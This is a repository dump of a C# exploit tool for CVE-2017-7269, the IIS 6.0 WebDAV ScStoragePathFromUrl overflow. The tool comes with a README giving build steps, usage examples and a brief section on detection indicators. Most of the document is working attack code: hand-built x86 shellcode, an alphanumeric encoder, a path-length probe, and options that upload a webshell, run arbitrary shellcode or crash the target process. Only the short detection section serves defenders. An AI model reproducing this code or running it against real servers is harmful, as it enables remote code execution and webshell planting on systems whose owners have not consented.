├── CVE-2017-7269.cs ├── README.md ├── getshell.png └── shellcode.png /CVE-2017-7269.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.Collections.Generic; 4 | using System.IO; 5 | using System.Web; 6 | using System.Net; 7 | using System.Net.Cache; 8 | using System.Net.Security; 9 | using System.Threading; 10 | using System.Security.Cryptography.X509Certificates; 11 | 12 | class Exploit 13 | { 14 | static Random rnd = new Random(); 15 | static string check_exit_process = "VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397O00WRJKPSSI7KQR72JPXKOXPQZKO2JKO36VXLJM1VZM0LCKNSOKON2KPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJMPNQ03LMLJPXNM1J13OWNMOS2H352CBKOJO0PCQFOUNMOB00NQNWNMP7OBP6OILMKZLMKZ130V15NMP2P0NQP7NMNWOBNV09KPM0A"; 16 | static string check_exit_thread = "VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397O00WRJKPSSI7KQR72JPXKOXPP3GP0PPP36VXLKM1VZM0LCKNSOKON2KPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJMPNQ03LMLJPXNM1J13OWNMOS2H352CBKOJO0PCQFOUNMOB00NQNWNMP7OBP6OILMKZLMKZ130V15NMP2P0NQP7NMNWOBNV09KPM0A"; 17 | private static bool CheckValidationResult(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors errors) { return true; } 18 | static bool stricmp(string s1, string s2) { return string.Equals(s1, s2, StringComparison.OrdinalIgnoreCase); } 19 | static void Help() 20 | { 21 | Console.WriteLine( 22 | @"usage: CVE-2017-7269 [parms] 23 | 24 | Header: 25 | -h set host for [If] header 26 | -p set port for [If] header 27 | -s set scheme for [If] header 28 
| -l length of physical path 29 | 30 | WebShell: 31 | -w upload webshell to server 32 | -wp path of webshell to save 33 | 34 | ShellCode: 35 | -c execute the shellcode 36 | 37 | Misc: 38 | -t test vulnerable only. 39 | -e exit process when getshell or test 40 | -k kill target(equals -e and -t) 41 | 42 | eg: 43 | CVE-2017-7269 http://192.168.1.1/ 44 | CVE-2017-7269 http://192.168.1.1/ -l 19 45 | CVE-2017-7269 http://host.remote/ -h test.local -p 8080 -s https 46 | CVE-2017-7269 http://192.168.1.1/ -e -l 22 -w evil.asp -wp /webshell.asp 47 | CVE-2017-7269 http://192.168.1.1/ -c shellcode.bin 48 | "); 49 | } 50 | static void Main(string[] args) 51 | { 52 | Console.WriteLine("Exploit for CVE-2017-7269(Microsoft IIS WebDav ScStoragePathFromUrl Overflow)."); 53 | Console.WriteLine("Part of GMH's fuck Tools, Code By zcgonvh.\r\n"); 54 | string shellname = ""; 55 | string shellfile = ""; 56 | byte[] shelldata = null; 57 | 58 | string shellcodefile = ""; 59 | byte[] shellcodedata = null; 60 | 61 | byte pathlen = 0; 62 | string IfHeader = ""; 63 | Uri u = null; 64 | string scheme = ""; 65 | string host = ""; 66 | int port = 0; 67 | 68 | bool isexit = false; 69 | bool testmode = false; 70 | 71 | ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(CheckValidationResult); 72 | string alpha = ""; 73 | Exception ex; 74 | HttpWebResponse response = null; 75 | if (args.Length < 1) 76 | { 77 | Help(); 78 | return; 79 | } 80 | try 81 | { 82 | u = new Uri(args[0]); 83 | for (int i = 1; i < args.Length; i++) 84 | { 85 | if (stricmp(args[i], "-h")) { i++; host = args[i]; } 86 | else if (stricmp(args[i], "-p")) { i++; port = int.Parse(args[i]); } 87 | else if (stricmp(args[i], "-s")) { i++; scheme = args[i]; } 88 | else if (stricmp(args[i], "-l")) { i++; pathlen = byte.Parse(args[i]); } 89 | else if (stricmp(args[i], "-w")) { i++; shellfile = args[i]; } 90 | else if (stricmp(args[i], "-wp")) { i++; shellname = args[i]; } 91 | else if 
(stricmp(args[i], "-c")) { i++; shellcodefile = args[i]; } 92 | else if (stricmp(args[i], "-t")) { testmode = true; } 93 | else if (stricmp(args[i], "-e")) { isexit = true; } 94 | else if (stricmp(args[i], "-k")) { testmode = true; isexit = true; } 95 | else { Help(); return; } 96 | } 97 | } 98 | catch { Console.WriteLine("[x] invalidate parms, try [-help]"); return; } 99 | 100 | try 101 | { 102 | if (shellcodefile != "") 103 | { 104 | shellcodedata = File.ReadAllBytes(shellcodefile); 105 | if (shellcodedata.Length == 0) { shellcodedata = null; }; 106 | } 107 | if (shellfile != "") 108 | { 109 | shelldata = File.ReadAllBytes(shellfile); 110 | if (shellname == "") { throw new Exception("shellpath must be set."); } 111 | if (shelldata.Length == 0) { shelldata = null; }; 112 | } 113 | if (shelldata != null && shellcodedata != null) { throw new Exception("webshell, or shellcode?"); } 114 | if (shelldata == null && shellcodedata == null && !testmode) { throw new Exception("webshell, or shellcode?"); } 115 | } 116 | catch (Exception e) 117 | { 118 | Console.WriteLine("[x] error on init, message: {0}", e.Message); 119 | return; 120 | } 121 | response = GetResponse(u, "GET", null, out ex); 122 | if (response == null) 123 | { 124 | Console.WriteLine("[x] can not connect to {0},error:\n {1}", ex); 125 | return; 126 | } 127 | if (scheme == "") 128 | { 129 | scheme = u.Scheme; 130 | } 131 | if (host == "") 132 | { 133 | host = u.Host; 134 | } 135 | if (port == 0) 136 | { 137 | port = u.Port; 138 | } 139 | 140 | if (pathlen == 0) 141 | { 142 | Console.WriteLine("[+] check length of target path..."); 143 | alpha = check_exit_thread; 144 | byte b = 0; 145 | for (b = 0; b < 114; b++) 146 | { 147 | IfHeader = GetIfHeader(scheme, host, port, b, alpha); 148 | response = GetResponse(u, "PROPFIND", IfHeader, out ex); 149 | if (response != null) 150 | { 151 | if ((int)response.StatusCode == 200) 152 | { 153 | if (response.Headers["X-ZCG-Check"] == "CVE-2017-7269") 154 | { 155 | pathlen 
= b; 156 | } 157 | else 158 | { 159 | Console.WriteLine("[?] server returns 200 but no header returned."); 160 | } 161 | break; 162 | } 163 | else if ((int)response.StatusCode == 500) 164 | { 165 | Thread.Sleep(100); 166 | continue; 167 | } 168 | else 169 | { 170 | Console.WriteLine("[?] server returns bad status: {0} {1}.", (int)response.StatusCode, response.StatusDescription); 171 | Console.WriteLine("[?] invulnerable or dead?"); 172 | DumpResponse(response); 173 | return; 174 | } 175 | } 176 | else 177 | { 178 | Console.WriteLine("[-] response error on length: {0},message: {1}", b, ex.Message); 179 | } 180 | } 181 | if (b == 114) 182 | { 183 | Console.WriteLine("[x] can not get length of target path!"); 184 | if (response != null) 185 | { 186 | Console.WriteLine("[?] last status code: {0}.", response.StatusCode); 187 | Console.WriteLine("[?] invulnerable or dead?"); 188 | DumpResponse(response); 189 | } 190 | return; 191 | } 192 | } 193 | if (pathlen == 0) 194 | { 195 | Console.WriteLine("[x] can not get length of target path!"); 196 | if (response != null) 197 | { 198 | DumpResponse(response); 199 | } 200 | return; 201 | } 202 | if (isexit) 203 | { 204 | alpha = check_exit_process; 205 | } 206 | else 207 | { 208 | alpha = check_exit_thread; 209 | } 210 | IfHeader = GetIfHeader(scheme, host, port, pathlen, alpha); 211 | response = GetResponse(u, "PROPFIND", IfHeader, out ex); 212 | if (response != null) 213 | { 214 | if ((int)response.StatusCode == 200) 215 | { 216 | if (response.Headers["X-ZCG-Check"] == "CVE-2017-7269") 217 | { 218 | Console.WriteLine("[+] length of target path is: " + pathlen); 219 | } 220 | else 221 | { 222 | Console.WriteLine("[?] server returns 200 but no header returned."); 223 | } 224 | } 225 | else if ((int)response.StatusCode == 500) 226 | { 227 | Console.WriteLine("[x] server returns 500 ,length of target path maybe wrong."); 228 | } 229 | else 230 | { 231 | Console.WriteLine("[?] 
server returns bad status: {0} {1}.", (int)response.StatusCode, response.StatusDescription); 232 | Console.WriteLine("[?] invulnerable or dead?"); 233 | DumpResponse(response); 234 | return; 235 | } 236 | } 237 | else 238 | { 239 | Console.WriteLine("[x] error on get shell response, message: {0}", ex.Message); 240 | } 241 | if (testmode) 242 | { 243 | Console.WriteLine("[+] check complete."); 244 | return; 245 | } 246 | if (shellcodedata == null) 247 | { 248 | Console.WriteLine("[+] upload webshell to server...."); 249 | alpha = AlphaEncodeWithUnicodeUpperCaseESI(BulidShellCode(shellname, shelldata, pathlen, isexit)); 250 | IfHeader = GetIfHeader(scheme, host, port, pathlen, alpha); 251 | response = GetResponse(u, "PROPFIND", IfHeader, out ex); 252 | if (response != null) 253 | { 254 | if ((int)response.StatusCode == 200) 255 | { 256 | if (response.Headers["X-ZCG-Shell-Status"] == "1") 257 | { 258 | Console.WriteLine("[!] webshell was successfully write to [{0}].", shellname); 259 | } 260 | else if (response.Headers["X-ZCG-Shell-Status"] == "0") 261 | { 262 | Console.WriteLine("[x] path: [{0}] was not writable.", shellname); 263 | } 264 | else 265 | { 266 | Console.WriteLine("[?] server returns 200 but no header returned."); 267 | } 268 | } 269 | else if ((int)response.StatusCode == 500) 270 | { 271 | Console.WriteLine("[x] server returns 500 ,length of target path maybe wrong."); 272 | } 273 | else 274 | { 275 | Console.WriteLine("[?] 
server returns unknown status: {0} {1}.", (int)response.StatusCode, response.StatusDescription); 276 | DumpResponse(response); 277 | } 278 | } 279 | else 280 | { 281 | Console.WriteLine("[x] error on get shell response, message: {0}", ex.Message); 282 | } 283 | } 284 | else 285 | { 286 | Console.WriteLine("[+] run shellcode on server...."); 287 | alpha = AlphaEncodeWithUnicodeUpperCaseESI(shellcodedata); 288 | IfHeader = GetIfHeader(scheme, host, port, pathlen, alpha); 289 | response = GetResponse(u, "PROPFIND", IfHeader, out ex); 290 | if (response != null) 291 | { 292 | Console.WriteLine("[+] shellcode was send to server, check response manually...."); 293 | DumpResponse(response); 294 | } 295 | else 296 | { 297 | Console.WriteLine("[?] shellcode response returns error message: {0}", ex.Message); 298 | Console.WriteLine("[?] check response manually...."); 299 | } 300 | } 301 | 302 | 303 | 304 | 305 | } 306 | static void DumpResponse(HttpWebResponse response) 307 | { 308 | if (response != null) 309 | { 310 | Console.WriteLine("[+] raw response:"); 311 | Console.WriteLine("HTTP/{0} {1} {2}", response.ProtocolVersion, (int)response.StatusCode, response.StatusDescription); 312 | foreach (string s in response.Headers.AllKeys) 313 | { 314 | Console.WriteLine(s + " : " + response.Headers[s]); 315 | } 316 | Console.WriteLine(); 317 | Console.WriteLine(new StreamReader(response.GetResponseStream()).ReadToEnd()); 318 | } 319 | } 320 | static string GetIfHeader(string scheme, string host, int port, byte pathlen, string shellcode) 321 | { 322 | return string.Format("<{0}://{1}:{2}/{3}{6}> (Not ) <{0}://{1}:{2}/{4}{7}{5}>", scheme, host, port, GetPadding(pathlen), GetPadding(pathlen), shellcode, HttpUtility.UrlEncode("橷䅄㌴摶䵆噔䝬敃瘲牸坩䌸扲娰夸呈ȂȂዀ栃汄剖䬷汭佘塚祐䥪塏䩒䅐晍Ꮐ栃䠴攱潃湦瑁䍬Ꮐ栃千橁灒㌰塦䉌灋捆关祁穐䩬"), HttpUtility.UrlEncode("婖扁湲昱奙吳ㅂ塥奁煐〶坷䑗卡Ꮐ栃湏栀湏栀䉇癪Ꮐ栃䉗佴奇刴䭦䭂瑤硯悂栁儵牺瑺䵇䑙块넓栀ㅶ湯ⓣ栁ᑠ栃̀翾￿￿Ꮐ栃Ѯ栃煮瑰ᐴ栃⧧栁鎑栀㤱普䥕げ呫癫牊祡ᐜ栃清栀眲票䵩㙬䑨䵰艆栀䡷㉓ᶪ栂潪䌵ᏸ栃⧧栁")); 323 | } 324 | static HttpWebResponse GetResponse(Uri u, string method, string 
IfHeader, out Exception exception) 325 | { 326 | HttpWebResponse response = null; 327 | HttpWebRequest request = null; 328 | exception = null; 329 | try 330 | { 331 | request = (HttpWebRequest)WebRequest.Create(u); 332 | if (IfHeader != null) { request.Headers.Add("If", IfHeader); } 333 | request.ContentLength = 0; 334 | request.KeepAlive = false; 335 | request.Method = method; 336 | request.CachePolicy = new HttpRequestCachePolicy(HttpRequestCacheLevel.NoCacheNoStore); 337 | request.ServicePoint.ConnectionLimit = 0xffffff; 338 | response = request.GetResponse() as HttpWebResponse; 339 | } 340 | catch (WebException ex) 341 | { 342 | response = ex.Response as HttpWebResponse; 343 | if (response == null) 344 | { 345 | request.Abort(); 346 | exception = ex; 347 | } 348 | return response; 349 | } 350 | catch (Exception ex) 351 | { 352 | request.Abort(); 353 | exception = ex; 354 | if (response != null) 355 | { 356 | response.Close(); 357 | } 358 | return null; 359 | } 360 | finally 361 | { 362 | request = null; 363 | } 364 | return response; 365 | } 366 | static string GetPadding(byte pathlen) 367 | { 368 | string padding = ""; 369 | string table = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; 370 | for (int i = pathlen; i < 114; i++) 371 | { 372 | padding += table[rnd.Next(0, 62)]; 373 | } 374 | return padding; 375 | } 376 | static byte[] BulidShellCode(string shellname, byte[] shelldata, byte pathlen, bool isexit) 377 | { 378 | int shellnamelen = shellname.Length + 1; 379 | int shellnamelenuni = shellnamelen * 2; 380 | int pathlenuni = pathlen * 2; 381 | int filenamesub = shellnamelenuni + pathlenuni; 382 | int shelldataoff = 0x16f + shellnamelenuni; 383 | List shellcode = new List(); 384 | shellcode.AddRange(new byte[] { 385 | 0x64, 0x8B, 0x35, 0x18, 0x00, 0x00, 0x00, 0x8B, 0x7E, 0x04, 0x57, 0x8B, 0x46, 0x30, 0x8B, 0x40, 386 | 0x0C, 0x8B, 0x40, 0x1C, 0x8B, 0x00, 0x8B, 0x40, 0x08, 0x8B, 0xD8, 0x53, 0x8B, 0xF8, 0x8B, 0x47, 387 | 0x3C, 0x8B, 0x54, 
0x07, 0x78, 0x03, 0xD7, 0x8B, 0x4A, 0x18, 0x8B, 0x5A, 0x20, 0x03, 0xDF, 0x49, 388 | 0x8B, 0x34, 0x8B, 0x03, 0xF7, 0xB8, 0x47, 0x65, 0x74, 0x50, 0x39, 0x06, 0x75, 0xF1, 0xB8, 0x72, 389 | 0x6F, 0x63, 0x41, 0x39, 0x46, 0x04, 0x75, 0xE7, 0x8B, 0x5A, 0x24, 0x03, 0xDF, 0x66, 0x8B, 0x0C, 390 | 0x4B, 0x8B, 0x5A, 0x1C, 0x03, 0xDF, 0x8B, 0x04, 0x8B, 0x03, 0xC7, 0x5B, 0x5F, 0x89, 0x47, 0xFC, 391 | 0xE8, 0x00, 0x00, 0x00, 0x00 392 | }); 393 | shellcode.Add(0x90);//nop or int3 394 | shellcode.AddRange(new byte[]{ 395 | 0x5E, 0x8B, 0xCE, 0x81, 0xC1, 0xE9, 0x00, 0x00, 0x00, 0x51, 0x53, 0xFF, 0xD0, 0x8B, 0xCE, 0x81, 396 | 0xC1, 0xF6, 0x00, 0x00, 0x00, 0x51, 0xFF, 0xD0, 0x8B, 0xD8, 0x8B, 0xCE, 0x81, 0xC1, 0x01, 0x01, 397 | 0x00, 0x00, 0x51, 0x53, 0x8B, 0x47, 0xFC, 0xFF, 0xD0, 0x57, 0x56, 0x81, 0xC6, 0x09, 0x01, 0x00, 398 | 0x00, 0x56, 0x83, 0xC6, 0x66, 0x81, 0xEF, 0x4C, 0x05, 0x00, 0x00 399 | }); 400 | if (pathlenuni > 0x7f) 401 | { 402 | shellcode.Add(0x83); 403 | shellcode.Add(0xc7); 404 | shellcode.AddRange(BitConverter.GetBytes(pathlenuni)); 405 | } 406 | else 407 | { 408 | shellcode.Add(0x83); 409 | shellcode.Add(0xc7); 410 | shellcode.Add((byte)pathlenuni); 411 | shellcode.Add(0x90); 412 | shellcode.Add(0x90); 413 | shellcode.Add(0x90); 414 | } 415 | shellcode.Add(0xb9); 416 | shellcode.AddRange(BitConverter.GetBytes(shellnamelenuni)); 417 | shellcode.AddRange(new byte[] { 0xfc, 0xf3, 0xa4 }); 418 | if (filenamesub > 0x7f) 419 | { 420 | shellcode.Add(0x81); 421 | shellcode.Add(0xef); 422 | shellcode.AddRange(BitConverter.GetBytes(pathlenuni)); 423 | } 424 | else 425 | { 426 | shellcode.Add(0x83); 427 | shellcode.Add(0xef); 428 | shellcode.Add((byte)filenamesub); 429 | shellcode.Add(0x90); 430 | shellcode.Add(0x90); 431 | shellcode.Add(0x90); 432 | } 433 | shellcode.AddRange(new byte[]{ 434 | 0x57, 0xFF, 0xD0, 0x83, 0xC4, 0x08, 0x5E, 0x5F, 0x85, 0xC0, 0x74, 0x3A, 0x89, 0x47, 0xF8, 0x50, 435 | 0x8B, 0xCE, 0x81, 0xC1, 0x0D, 0x01, 0x00, 0x00, 0x51, 0x53, 0x8B, 0x47, 0xFC, 0xFF, 
0xD0, 0x8B, 436 | 0xCE 437 | }); 438 | shellcode.Add(0x81); 439 | shellcode.Add(0xc1); 440 | shellcode.AddRange(BitConverter.GetBytes(shelldataoff)); 441 | shellcode.AddRange(new byte[]{ 442 | 0x51, 0xFF, 0xD0, 0x83, 0xC4, 0x08, 0x8B, 0xCE, 0x81, 0xC1, 0x13, 0x01, 0x00, 0x00, 0x51, 0x53, 443 | 0x8B, 0x47, 0xFC, 0xFF, 0xD0, 0x8B, 0x4F, 0xF8, 0x51, 0xFF, 0xD0, 0xB0, 0x31, 0xEB, 0x02, 0xB0, 444 | 0x30, 0x8B, 0xCE, 0x81, 0xC1, 0x5C, 0x01, 0x00, 0x00, 0x88, 0x01, 0x81, 0xEF, 0x40, 0x03, 0x00, 445 | 0x00, 0x8B, 0x0F, 0x8B, 0x01, 0x8B, 0x80, 0xA0, 0x00, 0x00, 0x00, 0x51, 0x68, 0xC8, 0x00, 0x00, 446 | 0x00, 0x81, 0xC6, 0x1A, 0x01, 0x00, 0x00, 0x56, 0x6A, 0x00, 0x83, 0xC6, 0x01, 0x56, 0x6A, 0x54, 447 | 0xFF, 0xD0 448 | }); 449 | if (isexit) 450 | { 451 | shellcode.AddRange(new byte[] { 0x6a, 0xff, 0x6a, 0xff, 0x66, 0xb8, 0x0a, 0x01 }); 452 | shellcode.AddRange(new byte[] { 0xBA, 0x00, 0x03, 0xFE, 0x7F, 0xFF, 0x12 }); 453 | } 454 | else 455 | { 456 | shellcode.AddRange(new byte[] { 0x33, 0xc0, 0x50, 0x50, 0x66, 0xb8, 0x0b, 0x01 }); 457 | shellcode.AddRange(new byte[] { 0xBA, 0x00, 0x03, 0xFE, 0x7F, 0xFF, 0x12 }); 458 | } 459 | shellcode.AddRange(new byte[] { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 }); 460 | shellcode.AddRange(new byte[]{ 461 | 0x4C, 0x6F, 0x61, 0x64, 0x4C, 0x69, 0x62, 0x72, 0x61, 0x72, 0x79, 0x41, 0x00, 0x6D, 0x73, 0x76, 462 | 0x63, 0x72, 0x74, 0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x5F, 0x77, 0x66, 0x6F, 0x70, 0x65, 0x6E, 0x00, 463 | 0x77, 0x00, 0x00, 0x00, 0x66, 0x70, 0x75, 0x74, 0x73, 0x00, 0x66, 0x63, 0x6C, 0x6F, 0x73, 0x65, 464 | 0x00, 0x00, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x2D, 0x54, 0x79, 0x70, 0x65, 0x3A, 0x20, 465 | 0x74, 0x65, 0x78, 0x74, 0x2F, 0x68, 0x74, 0x6D, 0x6C, 0x0D, 0x0A, 0x43, 0x6F, 0x6E, 0x74, 0x65, 466 | 0x6E, 0x74, 0x2D, 0x4C, 0x65, 0x6E, 0x67, 0x74, 0x68, 0x3A, 0x20, 0x31, 0x33, 0x0D, 0x0A, 0x58, 467 | 0x2D, 0x5A, 0x43, 0x47, 0x2D, 0x53, 0x68, 0x65, 0x6C, 0x6C, 0x2D, 0x53, 
0x74, 0x61, 0x74, 0x75, 468 | 0x73, 0x3A, 0x20, 0x3F, 0x0D, 0x0A, 0x0D, 0x0A, 0x43, 0x56, 0x45, 0x2D, 0x32, 0x30, 0x31, 0x37, 469 | 0x2D, 0x37, 0x32, 0x36, 0x39, 0x00 470 | }); 471 | shellcode.AddRange(Encoding.Unicode.GetBytes(shellname)); 472 | shellcode.Add(0); 473 | shellcode.Add(0); 474 | shellcode.AddRange(shelldata); 475 | shellcode.Add(0); 476 | return shellcode.ToArray(); 477 | } 478 | 479 | static string AlphaEncodeWithUnicodeUpperCaseESI(byte[] shellcode) 480 | { 481 | string header = "VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB"; 482 | string valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ"; 483 | StringBuilder alpha = new StringBuilder(header); 484 | for (int j = 0; j < shellcode.Length; j++) 485 | { 486 | byte input = shellcode[j]; 487 | uint A = (uint)((input & 0xf0) >> 4); 488 | uint F = (uint)((input & 0x0f)); 489 | uint i = (uint)(rnd.Next() % valid_chars.Length); 490 | while ((valid_chars[(int)i] & 0x0f) != F) { i = (uint)(++i % valid_chars.Length); } 491 | uint E = (uint)(valid_chars[(int)i] >> 4); 492 | uint D = (uint)((A - E) & 0x0f); 493 | i = (uint)(rnd.Next() % valid_chars.Length); 494 | while ((valid_chars[(int)i] & 0x0f) != D) { i = (uint)(++i % valid_chars.Length); } 495 | uint C = (uint)(valid_chars[(int)i] >> 4); 496 | alpha.Append((char)(byte)((C << 4) + D)); 497 | alpha.Append((char)(byte)((E << 4) + F)); 498 | } 499 | alpha.Append('A'); 500 | return alpha.ToString(); 501 | } 502 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # cve-2017-7269 webshell and shellcode tool 2 | 3 | ### build 4 | 5 | csc cve-2017-7269.cs 6 | 7 | ### usage 8 | 9 | CVE-2017-7269 [parms] 10 | 11 | Header: 12 | -h set host for [If] header 13 | -p set port for [If] header 14 | -s set scheme for [If] header 15 | -l length of physical path 
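16 | 17 | WebShell: 18 | -w upload webshell to server 19 | -wp path of webshell to save 20 | 21 | ShellCode: 22 | -c execute the shellcode 23 | 24 | Misc: 25 | -t test vulnerable only. 26 | -e exit process when getshell or test 27 | -k kill target(equals -e and -t) 28 | 29 | ### example 30 | 31 | CVE-2017-7269 http://192.168.1.1/ 32 | CVE-2017-7269 http://192.168.1.1/ -l 19 33 | CVE-2017-7269 http://host.remote/ -h test.local -p 8080 -s https 34 | CVE-2017-7269 http://192.168.1.1/ -e -l 22 -w evil.asp -wp /webshell.asp 35 | CVE-2017-7269 http://192.168.1.1/ -c shellcode.bin 36 | 37 | ### detection 38 | 39 | After one initial GET, every request this tool sends is a WebDAV PROPFIND with `Content-Length: 0` and an `If` header; when `-l` is not given it first probes the path length with up to 114 such requests in a row, retrying after each HTTP 500. 40 | The bundled check payloads answer with the response header `X-ZCG-Check: CVE-2017-7269`, and the webshell payload answers with `X-ZCG-Shell-Status: 1` (written) or `0` (path not writable) and the body `CVE-2017-7269`; these markers identify unmodified builds of this tool only. 41 | With `-e` or `-k` the payload exits the process that handled the request, so an unexpected exit of that process next to such PROPFIND traffic is a further indicator. Disabling WebDAV on the server removes the PROPFIND path the tool depends on. 42 | 43 | -------------------------------------------------------------------------------- /getshell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zcgonvh/cve-2017-7269-tool/ae3ebb43c5c48ad983a67331edd457c6a02f4660/getshell.png -------------------------------------------------------------------------------- /shellcode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zcgonvh/cve-2017-7269-tool/ae3ebb43c5c48ad983a67331edd457c6a02f4660/shellcode.png --------------------------------------------------------------------------------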